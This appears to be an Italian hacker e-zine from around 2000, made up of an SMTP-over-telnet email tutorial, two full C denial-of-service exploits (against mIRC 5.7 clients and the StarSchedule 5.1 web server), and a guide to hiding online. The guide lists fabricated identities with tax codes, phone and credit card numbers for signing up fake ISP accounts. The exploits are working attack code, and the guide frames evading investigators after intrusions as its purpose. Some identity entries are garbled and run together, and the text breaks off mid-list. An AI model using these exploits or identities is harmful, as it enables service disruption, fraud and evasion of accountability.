*********************************************************************************************** 354 Enter mail, end with "." on a line by itself *********************************************************************************************** Questa risposta del server significa che possiamo cominciare a scrivere il corpo del nostro mes- saggio. Comunque, specifica anche indirettamente che questo è il momento di scrivere il soggetto di una email. Possiamo specificare il soggetto di una email come segue: *********************************************************************************************** Subject: Hi *********************************************************************************************** Dove ‘subject:’ è la parola chiave, che dice al server mail che sei pronto di scrivere nel tuo soggetto ‘Hi’, è il soggetto a tua scelta. Puoi continuare con il corpo dell’email premendo il tasto ‘Invio’ e scrivendo i caratteri. La fine con il ‘.’ e tutto rimane lo stesso. Andiamo attraverso l’intero processo, passo dopo passo. Ricorda che ho inserito commenti dove necessario nelle parentesi. Sia le parentesi che i caratteri nelle parentesi non sono parte degli attuali comandi. Per questo esempio, abbiamo bisogno di ricordare le seguenti informazioni: *********************************************************************************************** Server Mail: mail.isp.com Indirizzo Email del Destinatario: namitas@bol.net.in Indirizzo Email del Mittente: ankit@bol.net.in Soggetto: Hi!!! Testo: This is a test message C:\windows>telnet mail.isp.com 220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec 2000 17:18:50 +0530 (IST) helo ankit.com 250-mail.isp.com Hello [203.xx.yyy.91], pleased to meet you mail from: ankit@bol.net.in 250 ankit@bol.net.in... Sender ok rcpt to: namitas@bol.net.in 250 namitas@bol.net.in... Recipient ok data 354 Enter mail, end with "." on a line by itself subject: Hi!!! This is a test message . 250 RAA0000001693 Message accepted for delivery *********************************************************************************************** Ora se esamini gli headers di questa email, vedrai che oltre agli headers che abbiamo analizzato prima, c’è una linea separata per il Soggetto. *********************************************************************************************** Return-Path: Received: from ankit.com by mail.isp.com (8.9.1/1.1.20.3/07Jul00-0916AM) id RAA0000001693; Thu, 7 Dec 2000 17:19:49 +0530 (IST) Date: Thu, 7 Dec 2000 17:19:49 +0530 (IST) From: Ankit Fadia Message-Id: <200012071149.RAA0000001693@mail.isp.com> Subject: Hi!!!! X-UIDL: 920156a3b926c5193036933e6d04efd5 This is a test message *********************************************************************************************** CC e BCC -------- Quali sono i comandi SMTP che equivalgono ai campi BCC e CC del tuo client email? Bene, questa domanda ha solo una semplice risposta: nessuno. Le seguenti righe ci diranno perché. Per capire la risposta alla domanda precedente, capiamo prima come esattamente fa un client un email a gestire un CC o un BCC. Come fa quando usiamo le funzioni CC e BCC? Ora, quando premi il comando Send, il tuo client email si connette alla porta 25 del server mail che hai specificato nella configurazione. Poi emetterà i comandi SMTP al server mail remoto e gli manderà le informazioni richieste. E con questo processo la tua email è stata mandata. L’ordine con il quale i vari comandi SMTP sono dati è come descritto precedentemente. Normalmente, quando hai solo un singolo destinatario, il tuo client email emetterà solo un singolo ‘RCPT TO:’ al server mail. Comunque, quando c’è più di un solo destinatario, il client email emetterà più di un ‘RCPT TO:’, o in altre parole, quando il campo CC del tuo client email non è vuoto, verranno emessi molti comandi RCPT. Come vedi il Simple Mail Transfer Protocolo (SMTP) non prevede nessun comando speciale per il CC. Il concetto di CC si affida a molti comandi RCPT al server mail. Lo stesso è il caso quando hai molti destinatari nel campo ‘To:’ del client email. Questo significa che non importa se aggiungi un indirizzo email del destinatario al campo CC o a ‘To:’. Il comando SMTP emesso e gli headers creati saranno gli stessi. Facciamo un esempio pratico per rendere tutto più chiaro. La lista di destinatari per questo esempio è la seguente: To: ankit@bol.net.in; ankitfadia@hotmail.com CC: ankit_Fadia@hotmail.com ; namitas@bol.net.in Questi sono i comandi che verranno emessi per mandare una email vuota con il soggetto ‘test’ dal seguente indirizzo email: test@bol.net.in alla lista di destinatari sovrariportata. *********************************************************************************************** C:\windows>telnet mail.isp.com 220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec 2000 17:18:50 +0530 (IST) helo ankit.com 250-mail.isp.com Hello [203.xx.yyy.91], pleased to meet you mail from: test@bol.net.in 250 test@bol.net.in... Sender ok rcpt to: ankit@bol.net.in 250 ankit@bol.net.in... Recipient ok rcpt to: ankitfadia@hotmail.com 250 ankitfadia@hotmail.com... Recipient ok rcpt to: ankit_fadia@hotmail.com 250 ankit_Fadia@hotmail.com... Recipient ok rcpt to: namitas@bol.net.in 250 namitas@bol.net.in... Recipient ok data 354 Enter mail, end with "." on a line by itself subject: Test . 250 RAA0000001693 Message accepted for delivery *********************************************************************************************** Chiaro? Ora, vediamo come funziona il BCC. Ora, nel caso precedente (nel caso di CC), il client email ha usato molti RCPT nella stessa sessione SMTP per mandare lo stesso email a molti destinatari. Comunque, in quel caso tutti possono vedere la lista dei destinatari. Questo accade perché tutte le email hanno gli stessi headers. Questo è dovuto al fatto che gli indirizzi email di tutti i destinatari sono stati dati al server mail durante la stessa sessione SMTP. Tutto questo potrebbe sembrare abbastanza vago e strano. Se è così, leggi i seguenti paragrafi per capire meglio. Ora, quando usi CC per una singola email a molti destinatari (diciamo 3), verrà usata la seguente procedura: Il client email fa partire la sessione al server mail remoto. Presenta se stesso e il mittente. Usa molti comandi RCPT per mandare la stessa email a molti destinatari. Il client email si disconnette. Poiché gli indirizzi email dei destinatari sono inseriti nella stessa sessione, si verranno a formare gli stessi headers. Così tutti i destinatari sono capaci di vedere gli indirizzi email ai quali è stata mandata questa email. Ora, in una situazione, quando usiamo BCC per la stessa email verso molti destinatari (diciamo 2), verrà usata la seguente procedura: Il client email fa partire la sessione al server mail remoto. Presenta se stesso e il mittente. Usa un solo comando RCPT per mandare la stessa email al primo email nella lista BCC. Il client email si disconnette. Il client email fa partire un’altra sessione al server mail remoto. Presenta di nuovo se stesso e il mittente. Usa un solo comando RCPT per mandare la stessa email al secondo email nella lista BCC. Il client email si disconnette di nuovo. In questo caso, a ogni destinatario è stata mandata una email attraverso un’unica sessione al server remoto, così ogni destinatario ha ricevuto un header diverso e non sono visualizzati gli altri indirizzi email. La descrizione precedente dell’uso di CC e di BCC è basata su come funziona Outlook Express. Comunque, attualmente Sendmail mette a disposizione un modo per usare i destinatari tramite CC. Dopo aver dato il comando DATA, si può dare la lista CC con il seguente comando: CC:Lista di destinatari Comunque, dare il comando BCC al posto di CC non produce lo stesso risultato. Mandare Attachment con Sendmail ------------------------------- Oggi, gli attachment [aggiunte, files da aggiungere all’email] MIME sono usati per trasferire i files inclusi in una email. Gli attachment MIME usano una codificazione Base64 per cirare i dati binari. Precedentemente veniva usato un altro metodo, che era chiamato Uuencode encoding standard. Puoi anche mandare attachment attraverso Sendmail usando uno dei seguenti metodi. La codificazione UU-encoding o Unix-to-Unix è una codificazione standard, che converte tutti i tipi di files in ASCII per trasmetterli. I files, che sono mandati attraverso la Rete, sono cifrati alla fine del mittente e decifrati alla fine del destinatario. Questo assicura che i files (attachment) possono essere trasferiti su diversi tipi di reti, routers di sistema, ecc senza perdite. Comunque, questo metodo potrebbe corrompere i files e non è quello che viene usato di solito. Secondo un’università, il meccanismo di base dell’UU-encoding è il seguente: Lo schema di base è dividere in gruppi di 3 caratteri otto-bit (24 bit) in 4 caratteri sei-bit e poi aggiungere 32 (uno spazio) a ogni carattere sei-bit, che lo trascrive nel carattere trasmittente. In altre parole, i caratteri a 6 bit cifrati sono trascritti nella serie: `!"#$%&'()*+,-./012356789:;<=>?@ABC...XYZ[\]^_ per trasmissioni su linee di comunicazione.Ogni cifrazione incremetna la dimensione del file del circa 42%. Così, il meccanismo dell’UU-encoding può essere il seguente: Il file è uuencoded (cifrato) alla finde del mittente ---------------> Il file è uuencoded alla fine del destinatario. Tutti gli attachment possono essere mandati attraverso la rete in forma uuencode. Vedi se inserisci il codice Uuencoded di ogni file dopo che hai emesso il comando DATA al prompt di Sendmail, il destinatario potrà ricevere l’attachment e visualizzarlo. La maggior parte dei client email permettono l’Uuencoding. (Anche se il client email usato dal destinatario non permette l’Uuencoding, ci sono molti strumenti che potrebbero farlo.) Tutti i files che contendono immagini, file audio, file video, file di testo ecc possono essere cifrati dall’Uuencoding standard per ottenere il codice uuencoded. Il metodo per mandare attachment cifrati è il seguente: Convertire il file da mandare come attachment nella forma uuencoded. Dare la forma uuencoded al server mail dopo il comando DATA. Ora parliamo del primo passaggio: Se stai usando una piattaforma Windows, tutto quello che devi avere per usare l’Uuencoding è Win-Zip. Se non hai WinZip, puoi scaricarlo da http://www.winzip.com WinZip può essere facilmente usato per ottenere l’Uuencode di tutti i file. Semplicemente creando un nuovo archivio contentente il file che vuoi cifrare e selezionare Action > Uuencode. Puoi anche premere Shift U. WinZip salverà la forma cifrata del file .zip nella forma: filename.uue Un tipico file .uue (in questo caso di un file di immagine) potrebbe essere il seguente: *********************************************************************************************** _=_ _=_ Part 001 of 001 of file new.zip _=_ begin 666 new.zip M4$L#!!0``@`(`#5S_RCDJL7+;P```'4````'````;F5W+F=I9G/W=+.P3)1G MX&%8R``"_T$`Q%#\R<+(P,#(H`/B@.0=F-QZ\INZ%.\\$DX(:]"N_76TM7"V M:6]\T+)755;)-P(C;UB]*)FR+OSYCGV';_HI7 tempfile.uu Questo dice al comando uuencode di cifrare il file myfile.doc e memorizzare il nome myfile.doc nel file cifrato risultante. I risultati sono poi reindirizzati (dal segno >) in un altro file che metterai nel tuo messaggio email più tardi. Le versioni DOS di questa utility sono reperibili in vari siti. #################### Ora, una volta che hai cifrato il file e ottenuto la forma Uuencoded, tutto quello che devi fare è copiarlo e incollarlo dopo il comando DATA che è stato appena emesso al prompt di Sendmail. Questo manderà il file come attachment. Questo era il metodo per mandare un attachment usando l’Uuencoding standard. Descriverò come mandare come mandare attachment usando il nuovo MIME standard nella prossima versione di questo manuale. Altri suggerimenti su SendMail ------------------------------ Normalmente quando ti connetti alla porta Sendmail di un sistema, hai a disposizione solo i co- mandi standard di SMTP. Benchè sono molti di più di quelli che hai bisogno, comunque, per quelli che vorresti usare con varie opzioni, ci sono altri comandi, che normalmente non ti sono disponibili. [questo passo non è molto chiaro, in pratica ci dice che ci sono altri comandi ‘carini’ che purtroppo non possono essere usati da noi]. Quello di cui sto parlando sono i comandi ESMTP o i comandi Extended Mail Transfer Protocol. Un server mail con ESMTP abilitato decide se questi comandi ESMTP sono disponibili al client sulla base di come il client si presenta a esso. Ora, normalmente ti presenti dando il comando: HELO dominio Ora, quando ti presenti il comando HELO, la maggior parte dei server mail mettono a disposizione solo i comandi SMTP. Ora, per poter utilizzare i comandi ESMTP, devi presentarti al server con il comando EHLO. Per esempio: ehlo ankit.com Ora, se il server mail a cui sei connesso ha ESMTP abilitato, ti risponderà dando una lista di comandi ESMTP. Qualcosa del genere: *********************************************************************************************** 220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec2000 17:18:50 +0530 (IST) ehlo ankit.com 250-mail.isp.com Hello [203.xx.yy.91], pleased to meet you 250-EXPN 250-VERB 250-8BITMIME 250-SIZE 250-DSN 250-ONEX 250-ETRN 250-XUSR 250 HELP *********************************************************************************************** #################### VERITà SULL’HACKING: Un modo di verificare se il tuo ISP ha i comandi ESMTP abilitati, è vedere la risposta del demone che appare quando ti connetti alla porta 25 del suo server mail. La parola ‘ESMTP’ ti dice che tali comandi sono disponibili. Per esempio: 220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec2000 17:18:50 +0530 (IST) #################### ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø MIRC 5.7 DENIAL OF SERVICE EXPLOITS ø ø sYn ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø /* diemirc.c - mIRC 5.7 denial of service exploits. (c) Chopsui-cide/MmM '00 Questo programma si mette in ascolto della porta 6667 per verificate le connessioni in arrivo, Dopo manda in crash il mIRC usando l'exploit che preferisci. */ #include #include #include #include #include #define LISTEN_PORT 6667 #define TARGET_NICK "Chopsui-cide" void listen_sock(int sock, int port); void die(char *message); int poll_for_connect(int listensock); int select_sploit(); void exploit1(int s); void exploit2(int s); void exploit3(int s); void exploit4(int s); main() { int ls; int c; if ((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) die("Unable to create socket."); c = select_sploit(); listen_sock(ls, LISTEN_PORT); printf("Waiting for connection on port %d...\n", LISTEN_PORT); ls = poll_for_connect(ls); switch (c) { case 0 : exploit1(ls); break; case 1 : exploit2(ls); break; case 2 : exploit3(ls); break; case 3 : exploit4(ls); } close(ls); return 0; } void listen_sock(int sock, int port) { struct sockaddr_in addr; int c = 0; memset((char *)&addr,'0', sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = INADDR_ANY; addr.sin_port = htons(port); if (bind(sock, &addr, sizeof(addr)) == -1) die("Error binding socket."); if (listen(sock, 20) == -1) die("Error listening."); } void die(char *message) { printf("Fatal error: %s\n", message); exit(1); } int poll_for_connect(int listensock) { struct sockaddr_in peer; int sendsock; int szpeer = sizeof(peer); do { sendsock = accept(listensock, (struct sockaddr *) &peer, &szpeer); } while(sendsock == -1); printf("Connection from [%s].\n", inet_ntoa(peer.sin_addr)); return sendsock; } #define last_select 3 int select_sploit() { char k; printf("Select exploit:\n0 - incomplete nick change.\n"); printf("1 - msg with loads of parameters.\n2 - incomplete mode change.\n"); printf("3 - incomplete kick.\n"); k = getchar(); if (atoi((char *)&k) > last_select) { printf("Invalid selection.\n"); exit(1); } if (((int)k < 0x30) || ((int)k > 0x39)) { printf("Invalid selection.\n"); exit(1); } return atoi((char *)&k); } /* Exploit 1: incomplete nick change mIRC 5.7 and past versions seem to suffer from bugs involving incomplete messages. I previously e-mailed Khaled M. Bey about one such bug, and it's fixed in this version, but there are other similiar (almost identical) bugs still in v5.7. This attack is executed from the _server_ side. All we need to do is send the client a half complete nick change message, ie ":!ident@host.com NICK" We must put the target's current nick name where is. */ #define END "!ident@host.com NICK\x0a" void exploit1(int s) { char sod[256]; memset((char *)&sod, '\0', 256); sod[0] = ':'; strcat(sod, TARGET_NICK); strcat(sod, END); send(s, sod, 256, 0); usleep(1000); // Make sure the packet gets there. } /* Exploit 2: server message overflow If the client sends a large message with to many parameters, it crashes, and part of the buffer is stuffed into EAX. */ #define MSG_LEN 1000 // This must be an even number. void exploit2(int s) { char sod[MSG_LEN]; int c = 0; do { sod[c] = 0xff; sod[c + 1] = ' '; c += 2; } while(c < MSG_LEN); send(s, sod, MSG_LEN, 0); usleep(1000); // Make sure the packet gets there. } /* Exploit 3: incomplete mode change This is basically the same as the nick change exploit. */ #define ENDd "!ident@host.com MODE\x0a" void exploit3(int s) { char sod[256]; memset((char *)&sod, '\0', 256); sod[0] = ':'; strcat(sod, TARGET_NICK); strcat(sod, ENDd); send(s, sod, 256, 0); usleep(1000); // Make sure the packet gets there. } /* Exploit 4: incomplete kick Another incomplete message bug. */ #define JOIN " JOIN #\x0a" #define KICK ": KICK #\x0a" void exploit4(int s) { char sod[256]; memset((char *)&sod, '\0', 256); sod[0] = ':'; strcat(sod, TARGET_NICK); strcat(sod, JOIN); printf("%s%s", sod, KICK); send(s, sod, strlen(sod), 0); send(s, KICK, strlen(KICK), 0); usleep(1000); // Make sure the packet gets there. } I not modify the program.! ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø STARSCHEDULE 5.1 WEB SERVER DOS ø ø ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø /* StarSchedule 5.1 Web Server DoS (common on port 801) * questo programma è stato scritto da Michael Stevens * * * Credits to Microsoft Security Webpage * --- Finally and exploit with style and a message */ #include /* I hope you know this one */ #include /* Socket types */ #include /* Sockets duh! */ #include /* Definitions of constants */ #include /* gethostbyname */ char crash[] = "GET /\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" " HTTP/1.0"; int main(int argc, char **argv) { struct sockaddr_in sin; struct hostent *pHostentry; char *tcp_dest; int sd, a_count = argc; unsigned short port; printf("----Crash StarSchedule 5.1 Server by Michael Stevens----\n"); printf("\n"); if (a_count < 3 || a_count > 3) { printf("usage: %s destination port\n",argv[0]); exit(1); } port = atoi(argv[2]); tcp_dest = argv[1]; if (( port > 65535) || (port < 1)) { printf("Port too high or low. Accepted ranges are 1 - 65535\n"); exit(1); } if ((pHostentry = gethostbyname(tcp_dest)) == NULL) { printf("Resolve failed check provided host information and retry.\n"); exit(1); } printf("Setting up connection structure...\n"); memcpy(&sin.sin_addr.s_addr, pHostentry->h_addr, pHostentry->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(port); printf("Read tcp_dest:\t\t %s\n", tcp_dest); printf("Official Hostname:\t %s\n", pHostentry->h_name); printf("IP Address:\t\t %s\n", inet_ntoa(sin.sin_addr.s_addr)); printf("port: \t\t\t %d\n", port); printf("Host length:\t\t %d\n\n", pHostentry->h_length); printf("Creating Socket...\n"); if((sd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { printf("Socket problems Quiting...\n"); exit(1); } printf("Got a socket descriptor of %d\n", sd); printf("Connecting Socket...\n"); if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) { printf("Connect error...\n"); close(sd); exit(1); } printf("Sending Code...\n"); send(sd, crash, sizeof(crash), 0); printf("Closing Socket...\n"); close(sd); printf("Exiting...\n"); return 0; } ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø MIMETIZZAZIONE TERMO OTTICA ø ø sYn ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø : Come nascondersi nella Rete :. ---[ C O N T E N U T i ]--- 0x00.0 Anonimato 0x00.1 CLI & BIC 0x00.2 Account falsi 0x00.3 Proxy 0x00.4 Socks 0x00.5 Wingate 0x00.6 Trovare Proxy, Socks & Wingate 0x00.7 Pericoli 0x00.0 ANONIMATO ================ Prima di effettuare qualsiasi operazione e'necessario sapere come nascondersi nella Rete. Questo non garantira' l'anonimato completo, ma rendera' piu' difficile il compito di chi deve trovarci. In questo articolo, esplicitamente rivolto ai newbbissimi, prenderemo in considerazione tutti i passaggi di una connessione Internet, dalla chiamata telefonica ai diversi "rimbalzi" sugli host della rete. Prima di effettuare qualsiasi tipo di "esperimento" consiglio di leggere completamente il documento, compresa la sezione "Pericoli". 0x00.1 CLI & BIC ---------------- Dove CLI sta per "Caller Line Identification" e BIC per "Blocco identificazione chiamante". Chiaramente stiamo parlando del collegamento telefonico. Il primo passo verso Internet e' la connessione dial-up con l'ISP (Internet Service Provider) Da alcuni mesi e' disponibile anche in Italia il CLI, ovvero l'invio del numero del chiamante; questo significa che chi riceve la vostra chiamata e' in grado di vedere in tempo reale il numero del chiamante. Per evitare che questo avvenga, e' disponibile il "Blocco identificazione chiamente", che disabilita (parzialmente) questa possibilita'. Mettendo il numero 1793 (o *67#) davanti al numero da chiamare, si inibisce la possibilita' di visualizzare il nostro numero sul display del ricevente, ma non l'invio dello stesso alla centrale Telecom; questo significa che comunque sui tabulati della telco sara' registrata la telefonata dalla vostra utenza all'ISP, quel giorno a quell'ora... 0x00.2 Account falsi -------------------- Scenario: voi state "hackerando" con l'account dell'abbonamento che vi hanno regalato; vi siete registrati con il vostro nome (Mario Rossi) e vi siete collegati al computer del Pentagono... il sysadmin si accorge di un ip strano collegato al sistema (il vostro ip!), esegue un traceroute sul vostro ip, prende nota del penultimo hop e si collega sulla porta 79 di quell'host (il vostro gateway): users online --------------- mrossi@tin.it 212.216.200.123 Mezz'ora dopo l'FBI e' a casa vostra e suona il campanello... Questa storiella ci insegna che non e' buona abitudine hackerare con l'abbonamento che abbiamo registrato con il nostro nome e i nostri dati anagrafici. Da quando sono nati i free-internet provider (Libero,Tiscali) la situazione e' alquanto migliorata (non che prima fosse fosse molto piu' complicata...); si possono creare fake-account a volonta', utilizzando un generatore di identita'(tipo quello di Cavallo de Cavallis). Naturalmente per effettuare l'abbonamento on-line, si dovranno rispettare alcune regole auree: una l'abbiamo gia' vista, ovvero la "disabilitazione" del CLI mettendo il numero 1793 prima del numero da chiamare, l'utilizzo di proxy. Eccovi ad esempio una piccola lista di identita' false: NOME Mathias COGNOME Ghiringhelli NATO IL 12 / 7 / 1965 A Porto Recanati (MC) RESIDENTE IN Viale Liberazione 29 14036 Moncalvo (AT) COD. FISCALE N. GHR MHS 65L12 G919A CELLULARE N. (Omnitel Libero) 0347-1743221 CARTA DI CREDITO 4095 1244 6919 7921 (Banca : CARIPLO) E-MAIL: mghiringhelli@... NOME Diego COGNOME Arrigoni NATO IL 18 / 5 / 1958 A Lido di Camaiore (LU) RESIDENTE IN Vicolo Adige 11 07041 Alghero (SS) COD. FISCALE N. RRG DGI 58E18 B455O CELLULARE N. (Tim EuroBasic) 0335-9990487 CARTA DI CREDITO 4095 8594 5337 9809 (Banca : CARIPLO) E-MAIL: darrigoni@... NOME Piero COGNOME Bonfanti NATO IL 15 / 7 / 1945 A Rapallo (GE) RESIDENTE IN Vicolo Croce 30 22030 Lasnigo (CO) COD. FISCALE N. BNF PRI 45L15 H183H CELLULARE N. (Tim EuroTime) 0338-4408500 CARTA DI CREDITO 4095 7843 7643 1133 (Banca : CARIPLO) E-MAIL: pbonfanti@... NOME Alfredo COGNOME Ghiringhelli NATO IL 20 / 11 / 1976 A Alghero (SS) RESIDENTE IN Piazza XXII Maggio 26 00152 Roma (ROMA) COD. FISCALE N. GHR LRD 76S20 A192A CELLULARE N. (Tim EuroProf.) 0335-4559612 CARTA DI CREDITO 4095 0501 1616 8025 (Banca : CARIPLO) E-MAIL: aghiringhelli@... NOME Giacomo COGNOME Rigamonti NATO IL 2 / 12 / 1959 A Lido di Camaiore (LU) RESIDENTE IN Via Napoli 16 94010 Pergusa (EN) COD. FISCALE N. RGM GCM 59T02 B455U CELLULARE N. (Tim EuroFamily) 0338-7536369 CARTA DI CREDITO 4095 8849 8508 3620 (Banca : CARIPLO) E-MAIL: grigamonti@... NOME Maurizio COGNOME Ferro NATO IL 2 / 11 / 1962 A Turbigo (MI) RESIDENTE IN Vicolo Adige 12 74100 Taranto (TA) COD. FISCALE N. FRR MRZ 62S02 L471O CELLULARE N. (Tim EuroFamily) 0338-9900884 CARTA DI CREDITO 4095 4057 1722 7069 (Banca : CARIPLO) E-MAIL: mferro@... NOME Gianpaolo COGNOME Caputo NATO IL 17 / 11 / 1969 A Conselve (PD) RESIDENTE IN Via Roma 20 90018 Termini Imerese (PA) COD. FISCALE N. CPT GPL 69S17 C964Q CELLULARE N. (Tim EurNOME Emanuele COGNOME Stefanucci NATO IL 11 / 8 / 1954 A Varese (VA) RESIDENTE IN Viale Liberazione 6 39100 Bolzano (BZ) COD. FISCALE N. STF MNL 54M11 L682G CELLULARE N. (Tim EurNOME Michele COGNOME Macchi NATO IL 2 / 9 / 1943 A Novi Ligure (AL) RESIDENTE IN Piazza XXII Maggio 20 94010 Pergusa (EN) COD. FISCALE N. MCC MHL 43P02 F965A CELLULARE N. (Tim EuNOME Gianpaolo COGNOME Cavallo NATO IL 17 / 9 / 1961 A Novi Ligure (AL) RESIDENTE IN Corso Trento 28 15067 Novi Ligure (AL) COD. FISCALE N. CVL GPL 61P17 F965C CELLULARE N. (Tim EuroTime) 0338-4491289 CARTA DI CREDITO 4095 3937 4466 3680 (Banca : CARIPLO) E-MAIL: gcavallo@... NOME Alessio COGNOME 